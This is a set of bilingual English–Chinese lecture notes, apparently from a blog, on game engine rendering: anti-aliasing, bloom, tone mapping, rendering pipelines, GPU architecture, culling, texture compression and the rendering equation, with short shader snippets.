      • Record constrast luminance and average luminance of current pixel and offset pixel

        记录当前像素和偏移像素的对比度亮度和平均亮度

        $L_{avg}\quad L_{contrast}$

      • Search along the 2 perpendicular direction and calculate the average luminance

        沿 2 垂直方向搜索并计算平均亮度

        $L_{edgein}\quad L_{edge2n}$

      • Until $\text{abs}( L_{edge1n} -L_{current})>0.25L_{contrast}\\text{abs}(L_{edge2n} -L_{current})>0.25L_{contrast}$

    Calculate Blend Coefficient

    ​计算混合系数

    webp

    • Compute blender coefficient

    targetP is the nearer edge end of CurrentP

    ​targetP 是 CurrentP 较近的边缘端

    if($(L_{avg}-L_{current}) * (L_{avg} -L_{targetp})> 0$)

    ​magnitude = 0;

    else
    magnitude = abs(0.5 - dst / edgeLength);

    Blend Nearby Pixels

    ​混合附近的像素

    • Compute blender coefficient

    webp

    PixelNewColor =Texture(CurrentP_UV+ offset_direction * offset_magnitude)

    FXAA Result

    webp

    TAA (Temporal Anti-aliasing)

    ​TAA(临时抗锯齿)

    webp

    Utilize spatial-temporal filtering methods to improve AA stability in motion

    ​利用空间-时间过滤方法来提高 AA 稳定性运动

    webp

    Post-process

    But, the real magic in Post-process…

    ​图像后处理,数字图像处理领域。

    webp

    Post-process in 3D Graphics refers to any algorithm that will be applied to the final image. lt can be done for stylistic reasons (color correction, contrast, etc.) or for realistic reasons (tone mapping, depth of field, etc.)

    ​3D 图形中的后处理是指应用于最终图像的任何算法。可以出于风格原因(色彩校正、对比度等)或现实原因(色调映射、景深等)来完成此操作。

    Bloom Effect

    What is Bloom

    webp

    • The physical basis of bloom is that, in the real world, lenses can never focus perfectly

      光晕的物理基础是,在现实世界中,镜头永远无法完美对焦

    • Even a perfect lens will convolve theincoming image with an Airy disk

      即使是完美的镜头也会将传入的图像与艾里斑进行卷积

    Detect Bright Area by Threshold

    ​使用阈值法检测发光区域

    webp

    Find Luminance (Y) apply the standard coefficients for sRGB:

    ​查找亮度 (Y),应用 sRGB 的标准系数:

    $$Y=R_{lin}*0.2126+G_{lin}*0.7152+B_{lin}*0.0722$$

    float threshold;
    float4 computeHighlightArea()
    {
    [...] // first do normal lighting calculations and output results
    float4scene_color = float4(lighting, 1.0f);
    // check whether fragment output is higher than threshold, if so output as highlight color
    float luminance = dot(scene_color.rgb, vec3(0.2126f, 0.7152f, 0.0722f));

    float4highlight_color = float4(0.0f, 0.0f, 0.0f, 1.0f);
    if(luminance > threshold)
    highlight color = float4(scene_color.rgb, 1.0f);
    return highlight_color;
    }

    Gaussian Blur

    webp

    ​使用二维正态分布的卷积核进行卷积作高斯模糊。

    Pyramid Guassian Blur

    ​金字塔高斯模糊

    webp

    We can’t do all that filtering at high resolution, so we need a way to downsample and upsample the image

    ​我们无法以高分辨率进行所有过滤,因此我们需要一种对图像进行下采样上采样的方法

    Need a weight coefficient to tweak final effect

    ​需要一个权重系数来调整最终效果

    Bloom Composite

    ​混合形成 Bloom 效果。

    webp

    webp

    Tone Mapping

    ​色调映射

    webp

    • No way to directly display HDR image in a SDR device

      无法在 SDR 设备中直接显示 HDR 图像

    • The purpose of the Tone Mapping function is to map the wide range of high dynamic range (HDR) colors into standard dynamic range (SDR) that a display can output

      色调映射功能的目的是将各种高动态范围 (HDR) 颜色映射到显示器可以输出的标准动态范围 (SDR)

    Tone Mapping Curve

    ​色调映射曲线

    webp

    float3 F(float3 x)
    {
    const float A = 0.22f;
    const float B = 0.30f;
    const float C = 0.10f;
    const float D = 0.20f;
    const float E = 0.01f;
    const float F = 0.30f;
    return((x * (A * x + C * B) + D * E) / (x * (A * x + B) + D * F)) - E / F;
    }

    float3 Uncharted2ToneMapping(float3 color, float adapted lum)
    {
    const float WHITE = 11.2f;
    return F(1.6f * adapted_lum * color) / F(WHITE);
    }
    • Get a filmic look without making renders dirty

      获得电影般的外观而不会使渲染变脏

    • Give images proper contrast andnicely roll off any pixels over 1

      为图像提供适当的对比度,并很好地滚掉超过 1 的任何像素

    ACES

    webp

    ​Academy Color Encoding System(ACES)是一种由美国电影艺术与科学学会(Academy of Motion Picture Arts and Sciences)开发的颜色管理系统。它旨在提供一种标准化的数字图像工作流程,以便在不同的硬件和软件平台上保持一致的颜色表现和图像质量。

    ​ACES 的主要目标是解决数字媒体制作中的颜色管理问题,确保从拍摄到后期制作再到最终呈现的整个过程中,颜色能够被准确和一致地处理。ACES 采用高动态范围(HDR)和广色域的工作方式,可以捕捉和表现更丰富的颜色和亮度细节。

    • Academy Color Encoding System

      学院颜色编码系统

      • Primarily for Film & Animation

        主要用于电影和动画

      • Interesting paradigms and transformations

        有趣的范例和转变

    • The useful bits

      有用的部分

      • Applying Color Grading in HDR is good

        在 HDR 中应用颜色分级效果很好

      • The idea of a fixed pipeline up to the final OTD transforms stage is good

        直到最终 OTD 转换阶段的固定管道的想法很好

        • Separates artistic intent from the mechanics ofsupporting different devices

          将艺术意图与支持不同设备的机制分开

    HDR and SDR Pipeline

    ​HDR 和 SDR 管道

    webp

    • Visual consistency between HDR / SDR

      HDR / SDR 之间的视觉一致性

    • Similar SDR results to previous SDR color pipeline

      与之前的 SDR 颜色管道类似的 SDR 结果

    • High quality

      高质量

    • High performance

      高性能

    • Minimal disruption to art teams

      对艺术团队的干扰最小化

      • Simple transition from current color pipeline

        从当前颜色管道简单过渡

      • Minimal additional overhead for mastering HDR and SDR

        掌握 HDR 和 SDR 的额外开销最小

    Tone Mapping Curve Comparison

    ​色调映射曲线比较

    webp

    Color Grading

    ​颜色分级

    webp

    Lookup Table (LUT)

    ​查找表 (LUT)

    webp

    • LUT is used to remap the input color values of source pixels to new output values based on data contained within the LUT

      LUT 用于根据 LUT 中包含的数据将源像素的输入颜色值重新映射到新的输出值

    • A LUT can be considered as a kind of color preset that can be applied to image or footage

      LUT 可以被视为一种可应用于图像或素材的颜色预设

    LUT 3D or 2D

    webp

    Artist Friendly Tools

    ​PS 之类的软件都可以创建 LUT。

    webp

    webp

    Color grading is the most cost-effective feature of game rendering

    ​颜色分级是游戏渲染中最具成本效益的功能

    Rendering Pipeline

    ​回顾一下渲染管线。

    One Equation for Everything

    webp

    What We Learned about Rendering (1/4)

    webp

    What We Learned about Rendering (2/4)

    webp

    What We Learned about Rendering (3/4)

    webp

    What We Learned about Rendering (4/4)

    webp

    Redering Pipeline

    webp

    • Rendering pipeline is the management order of all rendering operation execution and resource allocation

      渲染管线是所有渲染操作执行和资源分配的管理顺序

    Forward Rendering

    for n meshes
    for m lights
    color += shading(mesh, light)

    ​按顺序渲染。

    webp

    Sort and Render Transparent after Opaque Objects

    webp

    ​渲染透明物体在不透明物体之后进行。

    Rednering with Many Lights

    ​渲染多个光。

    Deferred Rendering

    延迟渲染

    webp

    webp

    Pros

    • Lighting is only computed for visible fragments

      仅针对可见片段计算光照

    • The data from the G-Buffer can be used for post-processing

      G-Buffer 中的数据可用于后处理

    Cons

    • High memory and bandwidth cost

      高内存和带宽成本

    • Not supporting transparent object

      不支持透明物体

    • Not friendly to MSAA

      对 MSAA 不友好

    Tile-based Rendering

    ​Tile-based Rendering(基于块的渲染)是一种在计算机图形学中常用的渲染技术。它通过将图像划分为小块(瓦片),并对每个瓦片进行独立的渲染,从而提高渲染效率和性能。

    ​在传统的全局渲染方法中,整个场景的几何体和纹理都需要被完整地装入显存中,并在每个像素上进行计算。这会导致内存和计算资源的浪费,尤其在处理复杂的场景时更加明显。而 Tile-based Rendering 则针对这个问题进行了优化。

    ​Tile-based Rendering 首先将场景划分为小块,每个块可以是一个像素或者更大的区域。然后,它只对可见的块进行处理,即只渲染那些对最终图像有贡献的部分。这样一来,渲染引擎可以专注于处理可见区域,减少了不必要的计算和内存访问操作。

    webp

    Light Culling by Tiles

    webp

    Depth Range Optimization

    ​深度范围优化

    webp

    • Get Min/Max depth per tile from Pre-z pass

      从 Pre-z pass 获取每个图块的最小/最大深度

    • Test depth bounds for each light

      测试每个灯的深度范围

    Tile-based Deferred Rendering

    webp

    Forward+ (Tile-based Forward) Rendering

    ​Forward+(基于图块的前向)渲染

    webp

    • Depth prepass (prevent overdraw / provide tile depth bounds)

      深度预通道(防止过度绘制/提供图块深度边界)

    • Tiled light culling (output: light list per tile)

      平铺灯光剔除(输出:每个平铺的灯光列表)

    • Shading per object (PS: lterate through light list calculated in light culling)

      每个对象的着色(PS:遍历在光剔除中计算的光列表)

    Cluster-based Rendering

    ​Cluster-based Rendering(基于集群的渲染)是一种用于分布式渲染的技术。它利用多个计算节点(也称为集群)的并行计算能力来加速图形渲染过程。

    ​在传统的单机渲染中,所有的渲染任务都由单个计算节点完成。这限制了渲染速度和处理复杂场景的能力。而 Cluster-based Rendering 则通过将渲染任务分发到多个计算节点上并行处理,提高了渲染效率和性能。

    ​在 Cluster-based Rendering 中,场景被划分为多个子区域,每个子区域由一个计算节点负责渲染。这些节点之间通过网络进行通信和协调,共同完成整个渲染任务。每个节点独立地渲染自己负责的子区域,并将结果传输回主节点进行合成,最终生成完整的图像。

    webp

    Visibility Buffer

    webp

    Real Rendering Pipeline

    webp

    Challenges

    webp

    • Complex parallel work needs to synchronize with complex resource dependency

      复杂的并行工作需要与复杂的资源依赖同步

    • Large amount of transient resource whose lifetime is shorter than one frame

      大量瞬态资源,其生命周期短于一帧

    • Complex resource state management

      复杂的资源状态管理

    • Exploit newly exposed GPU features without extensive user low level knowledge

      无需广泛的用户低级知识即可利用新公开的 GPU 功能

    Frame Graph

    webp

    A Directed Acyclic Graph (DAG) of pass and resource dependency in a frame, not a real visual graph

    ​帧中通道和资源依赖关系的有向无环图 (DAG),而不是真正的可视化图

    Render to Monitor

    ​渲染到显示器

    Screen Tearing

    ​Screen Tearing(屏幕撕裂)是一种在计算机和视频游戏中常见的图像问题。它通常出现在快速移动或相机旋转等情况下,导致图像出现水平分割线或不协调的图案,影响观看体验。

    ​Screen Tearing 的出现是由于显示器和 GPU 之间的同步问题。当 GPU 在渲染新帧时,如果显示器正在显示先前的帧,就会发生 Screen Tearing。这是因为显示器和 GPU 的帧速率不同步,导致部分新帧和部分旧帧同时显示在屏幕上,从而产生撕裂的效果。

    ​解决 Screen Tearing 的方法包括垂直同步(V-sync)和自适应同步(Adaptive-Sync)。垂直同步是一种通过锁定 GPU 的输出速度来匹配显示器的刷新速率的技术。它可以防止屏幕撕裂,但可能会导致输入延迟和帧率下降。自适应同步则是一种更高效的技术,它可以根据 GPU 的输出动态地调整显示器的刷新速率,以匹配 GPU 的速度,从而消除屏幕撕裂并保持更平滑的画面。

    webp

    In most games your GPU frame rate will be highly volatile

    ​在大多数游戏中,您的 GPU 帧速率会非常不稳定

    When new GPU frame updates in the middle of last screen frame, screen tearing occurrs

    ​当新的 GPU 帧在最后一个屏幕帧的中间更新时,屏幕撕裂发生

    V-Sync Technology

    webp

    Synchronizing buffer swaps with the Vertical refresh is called V-sync

    ​将缓冲区交换与垂直刷新同步称为 V-sync

    V-Sync can be used to prevent tearing but framerates are reduced, the mouse is lagging & stutteringruins gameplay

    ​垂直同步可用于防止撕裂,但帧速率会降低,鼠标会出现滞后和卡顿,从而破坏游戏玩法

    Variable Refresh Rate

    ​可变刷新率(Variable Refresh Rate,VRR)是一种显示技术,用于动态调整显示器的刷新率,以匹配输入信号的帧率。传统的显示器通常以固定的刷新率(例如 60Hz 或 120Hz)工作,但 VRR 技术允许显示器根据实际的帧率来动态调整刷新率。

    ​VRR 技术最常见的实现是 AMD 的 FreeSync 和 NVIDIA 的 G-Sync。当显示器采用 VRR 技术时,它可以与图形处理单元(GPU)通信,以了解当前帧率,并相应地调整自己的刷新率。这意味着在低帧率情况下,显示器可以减少刷新率,而在高帧率情况下,可以增加刷新率,从而实现更流畅的画面表现。

    webp

    ]]>
    + 资源

    课程

    第四节:游戏引擎中的渲染实践

    Rendering on Game Engine

    Rendering System in Games

    webp

    ​游戏渲染发展历程。

    Q: Is there any game without rendering?

    ​有。比如文字游戏。

    Rendering on Graphics Theory

    • Objects with one type of effect

      具有一种效果的对象

    • Focus on representation and math correctness

      注重表示和数学正确性

    • No strict performance requirement

      无严格的性能要求

      • Realtime (30 FPS) / interactive (10 FPS)

        实时 (30 FPS) / 交互式 (10 FPS)

        对于游戏来说,应保证游戏画面流畅

      • offline rendering

        离线渲染(无法实时渲染,如电影,海报等,画质好)

      • Out-of-core rendering

        核外渲染

    Challenges on Game Rendering (1/4)

    webp

    Tens of thousands of objects with dozens type of effects

    ​数万个物体,数十种效果。容易跑不动。

    Challenges on Game Rendering (2/4)

    webp

    Deal with architecture of modern computer with a complex combination of CPU and GPU

    ​处理具有 CPU 和 GPU 复杂组合的现代计算机体系结构。(设计游戏引擎时,要考虑 CPU 和 GPU 的架构来写代码)

    Challenges on Game Rendering (3/4)

    webp

    Commit a bullet-proof framerate

    ​保证帧率

    • 30 FPS (60 FPS,120 FPS + VR)

    • 1080P, 4K and 8K resolution

    ​现在对游戏的分辨率和帧率要求越来越高了。

    Challenges on Game Rendering (4/4)

    • Limit access to CPU bandwidthand memory footprint

      限制对 CPU 带宽和内存占用的访问

    • Game logic, network, animation, physics and Al systems are major consumers of CPU and main memory

      游戏逻辑、网络、动画、物理和人工智能系统是 CPU 和主存的主要消耗者

    Rendering on Game Engine

    A heavily optimized practical software framework to fulfill the critical rendering requirements of games on modern hardware (PC, console and mobiles)

    ​高度优化的实用软件框架,可满足现代硬件(PC、游戏机和移动设备)上游戏的关键渲染要求

    Outline of Rendering

    ​本课程主要介绍的渲染技术,仅是蜻蜓点水,这玩意太复杂了。

    1. Basics of Game Rendering

      游戏渲染基础知识

      • Hardware architecture

        硬件架构

      • Render data organization

        渲染数据组织

      • Visibility

        能见度

    2. Materials, Shaders and Lighting

      材质、着色器和光照

      • PBR (SG, MR)

        PBR(SG、MR)

      • Shader permutation

        着色器排列

      • Lighting

        灯光

        • Point / Directional lighting

          点/定向照明

        • IBL / Simple GI

          IBL / 简单 GI

    3. Special Renering

      特殊渲染

      • Terrain

        地形

      • Sky / Fog

        天空/雾

      • Postprocess

        后期处理

    4. Pipeline

      管道

      • Forward, deferred rendering, forward plus

        前向、延迟渲染、前向加号

      • Real pipeline with mixed effects

        具有混合效果的真实管道

      • Ring buffer and V-Sync

        环形缓冲区和垂直同步

      • Tiled-based rendering

        基于平铺的渲染

    What Is Not Included

    • Cartoon Rendering

      卡通渲染(非真实渲染)

    • 2D Rendering Engine

      二维渲染引擎(三渲二)

    • Subsurface

      皮肤

    • Hair /Fur

      头发 / 皮毛

    Building Blocks of Rendering

    ​渲染的构建块

    Rendering Pipeline and Data

    ​渲染管道及数据

    webp

    ​图像的渲染过程。从 GAMES101 里搬来的图。

    Tens of millions of pixels with hundreds ALU and dozen of texture samplings.

    ​数千万像素,数百个 ALU 和数十个纹理采样。

    Computation - Projection and Rasterization

    ​计算-投影和光栅化

    webp

    Computation - Shading

    ​计算-着色

    ​写的 Shader 在显卡中存储/计算。

    webp

    A shader sample code

    ​着色器示例代码

    • Constants /Parameters

      常量/参数

    • ALU algorithms

      ALU 算法

    • Texture Sampling

      纹理采样

    • Branches

      分支

    Computation -Texture Sampling

    ​计算-纹理采样

    webp

    • Step1

      Use two nearest mipmap levels

      使用两个最近的 mipmap 级别

    • Step2

      Perform bilinear interpolation in both mip-maps

      在两个 mip-map 中执行双线性插值

    • Step3

      Linearly interpolate betweenthe results

      在结果之间进行线性插值

    Understanding the Hardware

    ​即使是游戏开发者/技术美术工作人员,了解一下显卡的基本架构也是很有用的。

    GPU

    The dedicated hardware to solve massive jobs

    ​解决大量工作的专用硬件

    SIMD and SIMT

    webp

    SlMD (Single Instruction Multiple Data 单指令多数据)

    • Describes computers with multiple processing elements that perform the same operation on multiple data points simultaneously

      描述具有多个处理元件的计算机,这些元件同时对多个数据点执行相同的操作

    webp

    SlMT (Single Instruction Multiple Threads 单指令多线程)

    • An execution model used in parallel computing where single instruction, multiple data (SlMD) is combined with multithreading

      并行计算中使用的执行模型,其中单指令、多数据 (SlMD) 与多线程相结合

    GPU Architecture

    webp

    GPC (Graphics Processing Cluster 图形处理集群)

    A dedicated hardware block for computing, rasterization, shadingand texturing

    ​用于计算、光栅化、着色和纹理的专用硬件块

    SM (Streaming Multiprocessor 流式多处理器)

    Part of the GPU that runs CUDA kernels

    ​运行 CUDA 内核的 GPU 的一部分

    Texture Units 纹理单位

    A texture processing unit, that can fetch and filter a texture

    ​纹理处理单元,可以获取和过滤纹理

    CUDA Core

    Parallel processor that allow data to be workedon simultaneously by different processors

    ​并行处理器允许不同处理器同时处理数据

    Warp

    A collection of threads

    ​线程的集合

    Data Flow from CPU to GPU

    webp

    • CPU and Main Memory

      CPU 和主内存

      • Data Load / Unload

        数据加载/卸载

      • Data Preparation

        数据准备

    • CPU to GPU

      • High Latency

        高延迟

      • Limited Bandwidth

        带宽有限

    • GPU and Video Memory

      GPU 和视频内存

      • High Performance Parallel Rendering

        高性能并行渲染

    Always minimize data transfer between CPU and GPU when possible

    ​尽可能减少 CPU 和 GPU 之间的数据传输

    Be Aware of Cache Efficiency

    webp

    ​Cache 比内存更快,尽量少做内存交换。

    webp

    • Take full advantage of hardware parallel computing

      充分利用硬件并行计算

    • Try to avoid the von Neumann bottleneck

      尽量避免冯诺依曼瓶颈

    GPU Bounds and Performance

    ​GPU 限制和性能

    Application performance is limited by:

    ​应用程序性能受到以下因素的限制:

    • Memory Bounds

      内存限制

    • ALU Bounds

      ALU 边界

    • TMU (Texture Mapping Unit) Bound

      TMU(纹理映射单元)绑定

    • BW (Bandwidth) Bound

      BW(带宽)限制

    Modern Hardware Pipeline

    webp

    • Direct3D 12graphics pipeline

      Direct3D 12 图形管道

    • Mesh and amplification shaders

      网格和放大着色器

    • Direct3D 12 compute pipeline

      Direct3D 12 计算管道

    Other State-of-Art Architectures

    ​其他最先进的架构

    webp

    GPU:

    1.825 GHZ, 52CUS, 12 TFLOPS FP32,332 8streaming processors

    DRAM:

    16 GB GDDR6, 10GB high memory interleave + 6GB low memory interleave

    20 channels of x16 GDDR6 @ 14 Gbps->560GB

    CPU:

    8x Zen2 CPU cores @ 3.8 GHz, 3.6 GHz W/SMT 32KB L1 I$,32KB L1 D$,512KB L2 per CPU core

    webp

    Renderable

    Mesh Render Component

    • Everything is a game object in the game world

      游戏世界中的一切都是游戏对象

    • Game object could be described in the component-based way

      游戏对象可以用基于组件的方式描述

    Building Blocks of Renderable

    ​可渲染的构建块

    webp

    Mesh Primitive

    ​网格基元

    webp

    Vertex and Index Buffer

    ​顶点和索引缓冲区

    webp

    • Vertex Data

      顶点数据

      • Vertex declaration

        顶点声明

      • Vertex buffer

        顶点缓冲区

    • Index Data

      索引数据

      • Index declaration

        索引声明

      • Index buffer

        索引缓冲区

    Why We Need Per-Vertex Normal

    webp

    ​为什么我们需要顶点法线?如果根据面法线计算的话,对于转角处,顶点法线方向可能会有歧义。

    Materials

    webp

    Determine the appearance of objects, and how objects interact with light

    ​确定物体的外观以及物体如何与光相互作用

    Famous Material Models

    webp

    Phong Model

    PBR Model - Physically based rendering 基于物理的渲染

    Subsurface Material - Burley SubSurface Profile 渲染皮肤

    Various Texures in Materials

    webp

    Variety of Shaders

    webp

    Render Objects in Engine

    Coordinate System and Transformation

    ​坐标系和变换

    webp

    Model assets are made based on local coordinate systems, and eventually we need to render them into screen space

    ​模型资源是基于局部坐标系制作的,最终我们需要将它们渲染到屏幕空间中

    Object with Many Materials

    webp

    ​如果一个对象仅使用一个材质,渲染出的效果可能不够真实。

    How to Display Different Textures on a Single Model

    webp

    ​将 Object 模型分为多个 Submesh,每个 Submesh 使用不同的 Material。

    webp

    ​如果每个 Submesh 都占据显存的空间,会导致浪费。

    Resource Pool

    webp

    ​使用一个资源池,加强资源的复用。

    Instance: Use Handle to Reuse Resources

    ​实例:使用句柄重用资源

    webp

    Sort by Material

    webp

    GPU Batch Rendering

    webp

    ​GPU Batch Rendering 是一种图形渲染技术,它利用计算机的 GPU(Graphics Processing Unit)来加速图形渲染过程。在传统的图形渲染中,每个物体都需要单独渲染,这会导致大量的数据传输和渲染时的负载,降低了渲染效率。

    ​而 GPU Batch Rendering 则可以将多个物体合并成一个批次(Batch),同时进行渲染。这种方式可以减少数据传输,提高渲染效率,特别是在大规模场景和复杂模型的情况下,可以极大地提高渲染速度。

    Q: What if group rendering all instances with identical submeshes and materials together?

    ​问:如果将具有相同子网格和材质的所有实例分组渲染在一起会怎样?

    Visibility Culling

    ​可见性剔除

    Culling One Object

    webp

    View Frustum

    ​观察片元

    Solider Bounding Box

    ​士兵边界框

    Using the Simplest Bound to Create Culling

    ​使用最简单的绑定来创建剔除

    webp

    • Inexpensive intersection tests

      廉价的交叉测试

    • Tight fitting

      紧身

    • Inexpensive to compute

      计算成本低廉

    • Easy to rotate and transform

      易于旋转和变换

    • Use little memory

      使用很少的内存

    Hierarchical View Frustum Culling

    webp

    ​使用 Quad Tree Culling 和 BVH 等,排除不可见对象

    Construction and insertion of BVH in Game Engine

    ​游戏引擎中 BVH 的构建和插入

    webp

    PVS (Potential Visibility Set)

    ​PVS(潜在可见性集)

    webp

    ​PVS(Potentially Visible Set)是一种基于空间划分的可视性剔除算法,用于在三维场景中快速确定观察点能够看到哪些物体。

    ​PVS 算法的基本思想是将场景分割成多个相邻的小区域(如八叉树等),然后对每个小区域计算其与其他小区域的可见性关系,即确定一个小区域可以直接看到哪些相邻的小区域,这些可见的小区域组成了该小区域的 PVS 集合。

    ​当观察点移动时,只需要判断当前观察点所处的小区域的 PVS 集合中是否包含其他小区域,从而确定哪些物体需要被渲染。这种方法可以大大减少需要渲染的物体数量,提高渲染效率。

    ​PVS 算法还可以通过优化 PVS 集合的计算和存储方式,以及合并相邻小区域的 PVS 集合等手段进一步提高效率。但是,由于 PVS 算法依赖于场景的空间划分,因此对于具有复杂几何形状或存在大量遮挡物的场景,该算法可能会带来较大的计算负担。

    Portal and PVS Data

    webp

    Determine potentially visible leaf nodes immediately from portal

    ​立即从门户确定潜在可见的叶节点

    The ldea of Using PVS in Stand-alone Games

    ​单机游戏中 PVS 的使用思路

    webp

    Green box:

    The area to determine the potential visibility where you need

    ​确定您需要的潜在可见度的区域

    Blue cells:

    Auto generated smaller regions of each green box.

    ​自动生成每个绿色框的较小区域。

    **Pros **优点

    • Much faster than BSP/Octree

      比 BSP/八叉树快得多

    • More flexible and compatible

      更灵活、更兼容

    • Preload resources by PVS

      通过 PVS 预加载资源

    GPU Culling

    webp

    ​先不渲染材质,根据深度信息排除掉不可见部分后再渲染。

    Texture Compression

    ​纹理压缩

    A must-know for game engine

    ​游戏引擎必须了解的知识

    Texture Compression

    webp

    • Traditional image compression like JPG and PNG

      传统图像压缩,如 JPG 和 PNG

      • Good compression rates

        良好的压缩率

      • lmage quality

        图像质量

      • Designed to compress or decompress an entire image

        设计用于压缩或解压缩整个图像

    • In game texture compression

      游戏中的纹理压缩

      • Decoding speed

        解码速度

      • Random access

        随机访问(传统图像压缩无法做到随机访问,即快速获取某个坐标的颜色值)

      • Compression rate and visual quality

        压缩率和视觉质量

      • Encoding speed

        编码速度

    Block Compression

    webp

    Common block-based compression format

    ​常见的基于块的压缩格式

    • On PC, BC7 (modern) or DXTC (old) formats

      在 PC 上,BC7(现代)或 DXTC(旧)格式

    • On mobile, ASTC (modern) or ETC / PVRTC (old) formats

      在移动设备上,ASTC(现代)或 ETC / PVRTC(旧)格式

    Authoring Tools of Modeling

    ​建模创作工具

    Modeling - Polymodeling

    webp

    ​使用基于多边形建模的软件。

    Modeling - Sculpting

    webp

    ​ZBrush 提供了一种新的建模概念——雕刻。

    Modeling -Scanning

    webp

    ​使用扫描仪建模。

    Modeling - Procedural Modeling

    webp

    ​程序化建模:

    Comparison of Authoring Methods

    ​创作方法比较

    PolymodelingSculptingScanningProcedural modeling
    AdvantageFlexibleCreativeRealisticIntelligent
    DisadvantageHeavy workloadLarge volume of dataLarge volume of dataHard to achieve

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    Sculpting Tools Create Infinite Details

    webp

    ​雕刻工具创造无限细节

    • Artists create models with infinite details

      艺术家创造具有无限细节的模型

    • From linear fps to open world fps, complex scene submit 10more times triangles to GPU per-frame

      从线性 fps 到开放世界 fps,复杂场景每帧向 GPU 提交 10 倍以上的三角形

    Cluster-Based Mesh Pipeline

    ​基于集群的网格管道

    webp

    GPU-Driven Rendering Pipeline (2015) GPU 驱动的渲染管道 (2015)

    • Mesh Cluster Rendering

      网格簇渲染

      • Arbitrary number of meshes in single drawcal

        单次绘制中任意数量的网格

      • GPU-culled by cluster bounds

        按集群边界进行 GPU 剔除,一个对象中的不可见部分就不渲染了

      • Cluster depth sorting

        聚类深度排序

    Geometry Rendering Pipeline Architecture (2021) 几何渲染管线架构(2021)

    • Rendering primitives are divided as:

      渲染基元分为:

      • Batch: a single APl draw (drawlndirect /drawIndexIndirect), composed of many Surfs

        Batch:单个 APl 绘制(drawlndirect /drawIndexIndirect),由许多 Surf 组成

      • Surf: submeshes based on materials, composed of many Clusters

        Surf:基于材质的子网格,由许多簇组成

      • Cluster: 64 triangles strip

        簇:64 个三角形条

    Programmable Mesh Pipeline

    webp

    GPU Culling in Cluster-Based Mesh

    ​基于集群的网格中的 GPU 剔除

    webp

    ​背面的 cluster 就看不见了。

    Nanite

    • Hierarchical LOD clusters with seamless boundary

      具有无缝边界的分层 LOD 集群

    • Don’t need hardware support, but using a hierarchical cluster culling on the precomputed BVH tree by persistent threads (CS) on GPU instead of task shader

      不需要硬件支持,但通过 GPU 上的持久线程(CS)而不是任务着色器对预先计算的 BVH 树使用分层集群剔除

    Take Away

    1. The design of game engine is deeply related to the hardware architecture design

      游戏引擎的设计与硬件架构设计有很深的关系

    2. A submesh design is used to support a model with multiple materials

      采用子网格设计来支持多种材质的模型

    3. Use culling algorithms to draw as few objects as possible

      使用剔除算法绘制尽可能少的对象

    4. As GPU become more powerful, more and more work are moved into GPU, which called GPu Driven

      随着 GPU 越来越强大,越来越多的工作转移到 GPU 上,这就是 GPU 驱动

    第五节:渲染中光和材质的数学魔法

    Rendering on Game Engine

    Lighting, Materials and Shaders

    Participants of Rendering Computation

    ​渲染计算参与者

    • Lighting

      灯光

      • Photon emit, bounce, absorb and perception is the origin of everything in rendering

        光子的发射、反弹、吸收和感知是渲染中一切的起源

    • Material

      材料

      • How matter react to photon

        物质如何对光子做出反应

    • Shader

      着色器

      • How to train and organize those micro-slaves to finish such a vast and dirty computation job between photon and materials

        如何训练和组织这些微型奴隶来完成光子和材料之间如此庞大而肮脏的计算工作

    An interesting adventure story joined by smart graphics scientists and engineers based on evolution of hardware.

    ​智能图形科学家工程师基于硬件的演变而加入的有趣冒险故事。

    The Rendering Equation

    ​James Kajiya 在 1986 年的 SIGGRAPH 提出了渲染方程:

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    出射 outgoing = 自发光 emitted + 反射光 reflected

    ​Radiance(辐射度)指的是在给定方向上单位面积上的能量辐射量。它表示了光线从光源或物体表面出射的能量。Radiance 与发射光线的方向、面积以及能量有关,通常用符号 L 表示,单位为 $W/(sr*m^2)$(瓦特/球面弧度平方米)。

    ​Irradiance(入射照度)指的是单位面积上受到的来自各个方向的光能量的总和。它表示了光线对物体表面的照射强度。Irradiance 与入射光线的方向、面积以及能量有关,通常用符号 E 表示,单位为 $W/m^2$(瓦特/平方米)。

    webp

    ​虽然这个方程很早就被提出,但是想要正确又高效地计算这个方程太困难了。

    webp

    Complexity of Real Rendering

    webp

    ​现实生活中的光太复杂了。

    • Indirect light

      间接光

    • Indirect shadow

      间接阴影

    • Direct light

      直射光

    • Scattering

      散射

    • Caustics

      焦散

    • Glossy reflections

      光泽反射

    The 1st Challenge: 1a Visibility to Lights

    webp

    ​第一困难:计算光照是否可见

    The 1st Challenge: 1b Light Source Complexity

    webp

    ​第一困难:光照种类复杂

    The 2nd Challenge: How to do Integral Efficiently on Hardware

    ​第二个挑战:如何在硬件上高效地进行积分

    webp

    • Brute-force way sampling

      暴力方式采样

    • Smarter sampling, i.e., Monta Carlo

      更智能的采样,即蒙塔卡罗

    • Derive fast analytical solutions

      得出快速分析解决方案

      • Simplify the $f_r$ :

        简化 $f_r$:

        • Assumptions the optical properties of materials

          假设材料的光学特性

        • Mathematical representation of materials

          材料的数学表示

      • Simplify the $L_i$ :

        简化$L_i$:

        • Deal with directional light, point light and spot light only

          仅处理定向光、点光和聚光灯

        • A mathematical representation of incident light sampling on a hemisphere, for ex: lBL and SH

          半球上入射光采样的数学表示,例如:lBL 和 SH

    The 3rd Challenge: Any matter will be light source

    ​挑战之三:任何物质都可以成为光源(会反射光)

    webp

    Starting from Simple

    Forget some abstract concepts for a while, ie. radiosity, microfacet and BRDF etc

    ​暂时忘记一些抽象概念,即。光能传递、微面、BRDF 等

    Simple Light Solution

    webp

    1
    2
    3
    4
    glLightfv(GL_LIGHTO, GL_AMBIENT, light_ambient);
    glLightfv(GL_LIGHTO, GL_DIFFUSE, light_diffuse);
    glLightfv(GL_LIGHTO,GL_SPECULAR, light_specular);
    glLightfv(GL_LIGHTO, GL_POSITION, light_position);
    • Using simple light source as main light

      使用简单光源作为主光

      • Directional light in most cases

        大多数情况下是定向光

      • Point and spot light in special case

        特殊情况下的点光源和聚光灯

    • Using ambient light to hack others

      利用环境光攻击他人

      • A constant to represent mean of complex hemisphere irradiance

        表示复半球辐照度平均值的常数

    • Supported in graphics APl

      图形 API 支持

    Environment Map Reflection

    webp

    • Using environment map to enhance glossary surface reflection

      使用环境贴图增强词汇表(?)表面反射

    • Using environment mipmap to represent roughness of surface

      使用环境 mipmap 来表示表面的粗糙度

    1
    2
    3
    4
    5
    6
    7
    void main()
    {
    vec3 N = normalize(normal);
